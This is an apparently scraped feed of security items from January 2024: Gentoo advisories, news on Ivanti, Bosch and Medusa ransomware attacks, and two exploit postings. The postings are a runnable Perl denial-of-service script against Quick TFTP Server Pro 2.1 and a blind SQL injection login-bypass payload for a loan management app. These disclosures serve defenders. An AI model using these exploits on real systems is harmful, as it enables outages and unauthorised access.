Gentoo Linux Security Advisory 202401-16 - Multiple vulnerabilities have been discovered in FreeRDP, the worst of which could result in code execution. Versions greater than or equal to 2.11.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: FreeRDP: Multiple Vulnerabilities  
     Date: January 12, 2024  
     Bugs: #881525, #918546  
       ID: 202401-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in FreeRDP, the worst of  
which could result in code execution.

Background  
=========  
FreeRDP is a free implementation of the remote desktop protocol.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
net-misc/freerdp  < 2.11.0      >= 2.11.0

Description  
==========  
Multiple vulnerabilities have been discovered in FreeRDP. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All FreeRDP users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-misc/freerdp-2.11.0"

References  
=========  
[ 1 ] CVE-2022-39316  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39316  
[ 2 ] CVE-2022-39317  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39317  
[ 3 ] CVE-2022-39318  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39318  
[ 4 ] CVE-2022-39319  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39319  
[ 5 ] CVE-2022-39320  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39320  
[ 6 ] CVE-2022-39347  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39347  
[ 7 ] CVE-2022-41877  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41877  
[ 8 ] CVE-2023-39350  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39350  
[ 9 ] CVE-2023-39351  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39351  
[ 10 ] CVE-2023-39352  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39352  
[ 11 ] CVE-2023-39353  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39353  
[ 12 ] CVE-2023-39354  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39354  
[ 13 ] CVE-2023-39355  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39355  
[ 14 ] CVE-2023-39356  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39356  
[ 15 ] CVE-2023-40181  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40181  
[ 16 ] CVE-2023-40186  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40186  
[ 17 ] CVE-2023-40187  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40187  
[ 18 ] CVE-2023-40188  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40188  
[ 19 ] CVE-2023-40567  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40567  
[ 20 ] CVE-2023-40569  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40569  
[ 21 ] CVE-2023-40574  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40574  
[ 22 ] CVE-2023-40575  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40575  
[ 23 ] CVE-2023-40576  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40576  
[ 24 ] CVE-2023-40589  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40589

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-16

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-16

Gentoo Linux Security Advisory 202401-15 - A vulnerability has been found in Prometheus SNMP Exporter which could allow for authentication bypass. Versions greater than or equal to 0.24.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Prometheus SNMP Exporter: Basic Authentication Bypass  
     Date: January 12, 2024  
     Bugs: #883649  
       ID: 202401-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in Prometheus SNMP Exporter which could  
allow for authentication bypass.

Background  
=========  
The Prometheus SNMP Exporter is the recommended way to expose SNMP data  
in a format which Prometheus can ingest.

Affected packages  
================  
Package                    Vulnerable    Unaffected  
-------------------------  ------------  ------------  
app-metrics/snmp_exporter  < 0.24.1      >= 0.24.1

Description  
==========  
A vulnerability has been discovered in Prometheus SNMP Exporter. Please  
review the CVE identifier referenced below for details.

Impact  
=====  
A user who knows the password hash of a user capable of performing HTTP  
basic authentication with a vulnerable exporter can use the hash to  
successfully authenticate as that user via cache manipulation, without  
knowing the password from which the hash was derived.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Prometheus SNMP Exporter users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-metrics/snmp_exporter-0.24.1"

References  
=========  
[ 1 ] CVE-2022-46146  
      https://nvd.nist.gov/vuln/detail/CVE-2022-46146

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-15

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-15

macOS suffers from an out-of-bounds write vulnerability in AppleVADriver when decoding mpeg2 videos.

macOS AppleVADriver Out-Of-Bounds Write

Linux suffers from an io_uring use-after-free vulnerability due to broken unix GC interaction.

Linux Broken Unix GC Interaction Use-After-Free

Quick TFTP Server Pro version 2.1 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Quick TFTP Server Pro 2.1 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 12 january 2024  
# Vendor Homepage: https://www.tallsoft.com/  
# Download to demo: https://drive.google.com/file/d/1Q4tIYjtv9Aqe5VE1fwnT18d3Cc-xkYEX/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Quick TFTP Server Pro 2.1  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=yz7_ImFYueA

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to TFTP.  
#The following request sends a large amount of data to the TFTP to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

my $filename = "exploit";

$shell = "A"x317;

my $mode = "A" x 1360;

my $muha = "\x00\x02" .$filename . "\x00" .$mode;

socket(SOCKET, PF_INET, SOCK_DGRAM, getprotobyname('udp')) or die "socket() failed: $!";  
send(SOCKET, $muha, 0, sockaddr_in($port, inet_aton($ip))) or die "send() failed: $!";  

print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

     _________  
    |         |  
    | Exploit |==( )    //////  
    |_________|   |||   | o o|                   
                    ||| ( c  )                  ____  
                     ||| \= /                  ||   \_  
                      ||||||                   ||     |  
                      ||||||                ...||__/|-"  
                      ||||||             __|________|__  
                        |||             |______________|  
                        |||             || ||      || ||  
                        |||             || ||      || ||  
      ------------|||-------------||-||------||-||-------  
                        |__>            || ||      || ||          

                              [+] Quick TFTP Server Pro 2.1 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Quick TFTP Server Pro 2.1 Denial Of Service

Copyright Loan Management System 2024 version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

    ## Title: Copyright © Loan Management System 2024-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 01/12/2024## Vendor: https://twitter.com/razormist## Software: https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `password` parameter is vulnerable to SQL injection attacks. Thepayload ' was submitted in the password parameter, and a databaseerror message was returned. Also, the attacker can bypass the loginform and log in to the system as an administrator using thisvulnerability SQLi bypass authentication.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: password (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=aeoZNyVE&password=r8D!y8e!I8' AND (SELECT 8282FROM (SELECT(SLEEP(7)))jrPA)# PgMx&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/razormist/2024/Loan-Management-System-2024-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/copyright-loan-management-system-2024.html)## Time spend:00:35:00

Copyright Loan Management System 2024 1.0 SQL Injection

The call for papers for Hardwear.io USA 2024 is open. It will take place May 31st through June 1, 2024.

    Call For Papers for Hardwear.io USA 2024 is OPEN!SUBMIT your #hardwaresecurity research now: https://hardwear.io/usa-2024/cfp.phpDeadline for submission: 15 February 2024Conference: 31 May - 1 June 2024, Santa Clara, USADo you have a groundbreaking embedded research or an awesome open-source tool you always wanted to present? What are you waiting for?Share your research findings with the Hardware Community by becoming a speaker!Welcome to the 6th Edition of Hardwear.io USA, fasten your seatbelts for intensive in-person trainings, top-notch hardware-security talks, professional networking, stimulating CTFs, and a challenging HardPwn.Research Submission Categories:1. New Research: A research topic that has not been presented/published or is not going to be presented/published before Hardwear.io USA 2024.2. Current Research and Workshops: Comprises known security issues, new research presented/published elsewhere, case studies, twist to existing research, vulnerability, exploit, or research-in-progress.3. Tool Category: Comprises open-source security tools, exploits, hardware, etc. This is an excellent opportunity for the original authors to showcase their work to the world.Speaker Benefits: https://hardwear.io/usa-2024/cfp.php <https://hardwear.io/usa-2024/cfp.php>We are interested in new and cutting-edge security work that has previously not been published. Some security topics for your reference include (but are not limited to):Internet of Things / Smart Devices | Embedded Systems & Cryptography | Industrial Control Systems / SCADA | Satellite Systems | Hardware Firmware | Hardware PentestingReach out to cfp@hardwear.io for any further questions. Thank you!"

Hardwear.io USA 2024 Call For Papers

As many as five different malware families were deployed by suspected nation-state actors as part of post-exploitation activities leveraging two zero-day vulnerabilities in Ivanti Connect Secure (ICS) VPN appliances since early December 2023.
"These families allow the threat actors to circumvent authentication and provide backdoor access to these devices," Mandiant said in an

Vulnerability / Threat Intelligence

As many as five different malware families were deployed by suspected nation-state actors as part of post-exploitation activities leveraging two zero-day vulnerabilities in Ivanti Connect Secure (ICS) VPN appliances since early December 2023.

"These families allow the threat actors to circumvent authentication and provide backdoor access to these devices," Mandiant said in an analysis published this week. The Google-owned threat intelligence firm is tracking the threat actor under the moniker **UNC5221**.

The attacks leverage an exploit chain comprising an authentication bypass flaw (CVE-2023-46805) and a code injection vulnerability (CVE-2024-21887) to take over susceptible instances.

Volexity, which attributed the activity to a suspected Chinese espionage actor named UTA0178, said the twin flaws were used to gain initial access, deploy webshells, backdoor legitimate files, capture credentials and configuration data, and pivot further into the victim environment.

According to Ivanti, the intrusions impacted less than 10 customers, indicating that this could be a highly-targeted campaign. Patches for the two vulnerabilities (informally called ConnectAround) are expected to become available in the week of January 22.

Mandiant's analysis of the attacks has revealed the presence of five different custom malware families, besides injecting malicious code into legitimate files within ICS and using other legitimate tools like BusyBox and PySoxy to facilitate subsequent activity.

"Due to certain sections of the device being read-only, UNC5221 leveraged a Perl script (sessionserver.pl) to remount the filesystem as read/write and enable the deployment of THINSPOOL, a shell script dropper that writes the web shell LIGHTWIRE to a legitimate Connect Secure file, and other follow-on tooling," the company said.

LIGHTWIRE is one of the two web shells, the other being WIREFIRE, which are "lightweight footholds" designed to ensure persistent remote access to compromised devices. While LIGHTWIRE is written in Perl CGI, WIREFIRE is implemented in Python.

Also used in the attacks are a JavaScript-based credential stealer dubbed WARPWIRE and a passive backdoor named ZIPLINE that's capable of downloading/uploading files, establishing a reverse shell, creating a proxy server, and setting up a tunneling server to dispatch traffic between multiple endpoints.

"This indicates that these are not opportunistic attacks, and UNC5221 intended to maintain its presence on a subset of high priority targets that it compromised after a patch was inevitably released," Mandiant further added.

UNC5221 has not been linked to any previously known group or a particular country, although the targeting of edge infrastructure by weaponizing zero-day flaws and the use of compromise command-and-control (C2) infrastructure to bypass detection bears all the hallmarks of an advanced persistent threat (APT).

"UNC5221's activity demonstrates that exploiting and living on the edge of networks remains a viable and attractive target for espionage actors," Mandiant said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Nation-State Actors Weaponize Ivanti VPN Zero-Days, Deploying 5 Malware Families

By Waqas
Firmware Vulnerability Found in Bosch Thermostat Model BCC100: Patch Now or Freeze.
This is a post from HackRead.com Read the original post: Hackers can hijack your Bosch Thermostat and Install Malware

Bitdefender Labs has discovered that the popular Bosch thermostat model BCC100 is vulnerable to cybersecurity threats. This vulnerability could allow a remote attacker to manipulate settings and install malware on the device.

Researchers have discovered vulnerabilities in the Bosch BCC100 thermostat, which could compromise users’ privacy and comfort. The vulnerabilities, discovered by Bitdefender Labs, allow attackers to access thermostat settings and data, manipulate settings remotely, and install malware.

The latest revelations regarding the vulnerable state of IoT devices should not be surprising. From electronic skateboards to coffee machines, from treadmills to security cameras in your room, everything connected to the internet is susceptible to potential threats.

As for the latest development, Bitdefender Labs, creator of the first smart home cybersecurity hub, regularly audits popular IoT hardware for vulnerabilities. Its latest research has revealed vulnerabilities in the Bosch BCC100 thermostat, affecting versions 1.7.0 – HD Version 4.13.22.

Bitdefender researchers discovered the vulnerability on August 29, 2023, but the details of it were only published on January 11, 2024. The vulnerability allows attackers to replace device firmware with a rogue version (CVE-2023-49722). The vulnerability was confirmed and triaged in October 2023, and Bosch started working on a fix immediately. Bitdefender responsibly disclosed the flaw on January 11, 2024.

To understand the flaw, it is essential to know how the BCC100 thermostat works. The thermostat uses two microcontrollers: a Hi-Flying chip (HF-LPT230) for Wi-Fi functionality and an STMicroelectronics chip (STM32F103) for implementing the main logic.

The STM chip lacks networking capabilities and relies on the Wi-Fi chip for communication. The Wi-Fi chip listens on TCP port 8899 on the LAN and, via the UART data bus, it mirrors any message received directly to the main microcontroller.

However, if properly formatted, the microcontroller cannot differentiate between malicious and genuine messages sent by the cloud server. An attacker can exploit this to send commands to the thermostat, including malicious updates.

The thermostat communicates with the connect.boschconnectedcontrol.com server via JSON-encoded payloads over a WebSocket, which are unmasked, and easy to imitate. The device initiates the “device/update” command on port 8899, triggering the thermostat to request details from the cloud server.

Despite an error code, the device accepts a forged response with the firmware update details, including the URL, size, MD5 checksum, and version. The device then requests the cloud server to download the firmware and send it through the WebSocket, ensuring the URL is accessible. Once the device receives the file, it performs the upgrade, finalizing the compromise.

According to Bitdefender Labs’ blog post, users are advised to follow necessary security practices. This includes updating the thermostat firmware, changing the default administrative password, avoiding connecting the thermostat to the internet unnecessarily, and using a firewall to restrict access from unauthorized devices.

Bitdefender Labs has stressed the significance of selecting secure smart home devices and ensuring their timely updates with the latest security patches. For specific details, refer to Bosch’s security advisory published on January 9, 2023.

Nevertheless, this research highlights that even seemingly innocuous smart devices can pose security risks. As the smart home market continues to grow, manufacturers must prioritize security and ensure a safe and reliable connected environment.

1.  **The Pros and Cons of Smart Homes**
2.  **Are Smart Home Devices Invading Your Privacy?**
3.  **White hat hacker infects smart coffee machine with ransowmare**
4.  **AXIS A1001 Network Door Controller Flaw Exposes Secure Facilities**
5.  **Controller-level flaws can let hackers physically damage moving bridges**
6.  **Power Grids to Airports: TETRA Radio Hacking Risks Global Infrastructure**

Hackers can hijack your Bosch Thermostat and Install Malware

The threat actors associated with the Medusa ransomware have ramped up their activities following the debut of a dedicated data leak site on the dark web in February 2023 to publish sensitive data of victims who are unwilling to agree to their demands.
“As part of their multi-extortion strategy, this group will provide victims with multiple options when their data is posted on their

The threat actors associated with the **Medusa ransomware** have ramped up their activities following the debut of a dedicated data leak site on the dark web in February 2023 to publish sensitive data of victims who are unwilling to agree to their demands.

"As part of their multi-extortion strategy, this group will provide victims with multiple options when their data is posted on their leak site, such as time extension, data deletion or download of all the data," Palo Alto Networks Unit 42 researchers Anthony Galiette and Doel Santos said in a report shared with The Hacker News.

"All of these options have a price tag depending on the organization impacted by this group."

Medusa (not to be confused with Medusa Locker) refers to a ransomware family that appeared in late 2022 before coming into prominence in 2023. It's known for opportunistically targeting a wide range of industries such as high technology, education, manufacturing, healthcare, and retail.

As many as 74 organizations, mostly in the U.S., the U.K., France, Italy, Spain, and India, are estimated to have been impacted by the ransomware in 2023.

Ransomware attacks orchestrated by the group commence with the exploitation of internet-facing assets or applications with known unpatched vulnerabilities and hijacking of legitimate accounts, often employing initial access brokers to obtain a foothold to target networks.

In one instance observed by the cybersecurity firm, a Microsoft Exchange Server was exploited to upload a web shell, which was then used as a conduit to install and execute the ConnectWise remote monitoring and management (RMM) software.

A notable aspect of the infections is the reliance on living-off-the-land (LotL) techniques to blend in with legitimate activity and sidestep detection. Also observed is the use of a pair of kernel drivers to terminate a hard-coded list of security products.

The initial access phase is followed by discovery and reconnaissance of the compromised network, with the actors ultimately launching the ransomware to enumerate and encrypt all files save for those with the extensions .dll, .exe, .lnk, and .medusa (the extension given to the encrypted files).

For each compromised victim, Medusa's leak site displays information about the organizations, ransom demanded, the amount of time left before the stolen data is released publicly, and the number of views in a bid to exert pressure on the company.

The actors also offer different choices to the victim, all of which involve some form of extortion to delete or download the pilfered data and seek a time extension to prevent the data from being released.

As ransomware continues to be a rampant threat, targeting tech companies, healthcare, critical infrastructure, and everything in between, the threat actors behind it are getting more brazen with their tactics, going beyond publicly naming and shaming organizations by resorting to threats of physical violence and even dedicated public relations channels.

"Ransomware has changed many facets of the threat landscape, but a key recent development is its increasing commoditization and professionalization," Sophos researchers said last month, calling ransomware gangs "increasingly media-savvy."

Medusa, per Unit 42, not only has a media team to likely handle their branding efforts, but also leverages a public Telegram channel named "information support," where files of compromised organizations are shared and can be accessed over the clearnet. The channel was set up in July 2021.

"The emergence of the Medusa ransomware in late 2022 and its notoriety in 2023 marks a significant development in the ransomware landscape," the researchers said. "This operation showcases complex propagation methods, leveraging both system vulnerabilities and initial access brokers, while adeptly avoiding detection through living-off-the-land techniques."

The development comes as Arctic Wolf Labs publicized two cases in which victims of Akira and Royal ransomware gangs were targeted by malicious third-parties posing as security researchers for secondary extortion attempts.

"Threat actors spun a narrative of trying to help victim organizations, offering to hack into the server infrastructure of the original ransomware groups involved to delete exfiltrated data," security researchers Stefan Hostetler and Steven Campbell said, noting the threat actor sought about 5 bitcoin in exchange for the service.

It also follows a new advisory from the Finnish National Cyber Security Centre (NCSC-FI) about a spike in Akira ransomware incidents in the country towards the end of 2023 by exploiting a security flaw in Cisco VPN appliances (CVE-2023-20269, CVSS score: 5.0) to breach domestic entities.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#vulnerability